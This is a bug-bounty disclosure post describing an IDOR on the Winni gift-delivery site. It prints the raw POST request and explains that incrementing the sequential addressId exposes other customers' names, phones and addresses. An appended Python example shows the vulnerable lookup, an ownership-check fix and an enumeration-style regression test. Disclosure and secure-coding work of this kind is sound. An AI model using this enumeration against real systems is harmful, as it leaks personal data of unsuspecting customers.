Almost a year ago I reported a PII data leak to the Winni Bug Bounty Program.
After 20+ follow-up emails, I am disclosing the issue, though the Winni team fixed it silently without responding.
The issue is a pretty straightforward IDOR.
Winni delivers cakes and gifts to your loved ones. While placing an order, before payment, it asks for the address.
When an address is selected, a POST request is made to fetch the address by its addressId.
POST /checkout/adv/address/select-previous HTTP/1.1
Host: www.winni.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: https://www.winni.in
Connection: close
Referer: https://www.winni.in/checkout/adv/address
Cookie: AWSALBTG=XXX

addressId=685945

Alter the addressId value to fetch another user's address along with their name and phone number.
As the addressId is sequential, an attacker can fetch every address available in the database, which results in a mass PII leak including data such as names, phone numbers and addresses.
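The missing server-side check behind this kind of IDOR, as an added example that is not from the original post and is not Winni's code: the handler names, the Address fields and the sample rows are constructed for illustration. The lookup has to be bound to the authenticated session's user instead of trusting the client-supplied addressId.

```python
# Added example: constructed data and hypothetical names, not Winni's code.
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Address:
    address_id: int
    owner_id: int   # account that saved this address
    name: str
    phone: str
    line: str

# Constructed sample rows with sequential ids, as in the report.
ADDRESSES = {
    a.address_id: a for a in (
        Address(1001, 7, "Asha", "555-0101", "12 Example Road"),
        Address(1002, 8, "Ravi", "555-0102", "34 Sample Street"),
    )
}

def select_previous_vulnerable(session_user_id: int, address_id: int) -> Optional[Address]:
    """Pattern described in the post: lookup keyed only by the client-supplied id."""
    return ADDRESSES.get(address_id)  # session_user_id is never consulted

def select_previous_fixed(session_user_id: int, address_id: int) -> Optional[Address]:
    """Scope the lookup to the authenticated user."""
    addr = ADDRESSES.get(address_id)
    if addr is None or addr.owner_id != session_user_id:
        return None  # same answer for 'not found' and 'not yours'
    return addr

def foreign_hits(handler, session_user_id: int, id_range) -> list:
    """Regression check: ids in id_range that return another account's address."""
    hits = []
    for i in id_range:
        addr = handler(session_user_id, i)
        if addr is not None and addr.owner_id != session_user_id:
            hits.append(i)
    return hits

if __name__ == "__main__":
    ids = range(1000, 1005)
    print("vulnerable:", foreign_hits(select_previous_vulnerable, 7, ids))
    print("fixed:     ", foreign_hits(select_previous_fixed, 7, ids))
```

Random, non-sequential ids make enumeration harder but do not replace the ownership check.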
POC
PS: Don't waste your time reporting to their bug bounty program.
Thanks for reading; any suggestions or feedback are welcome.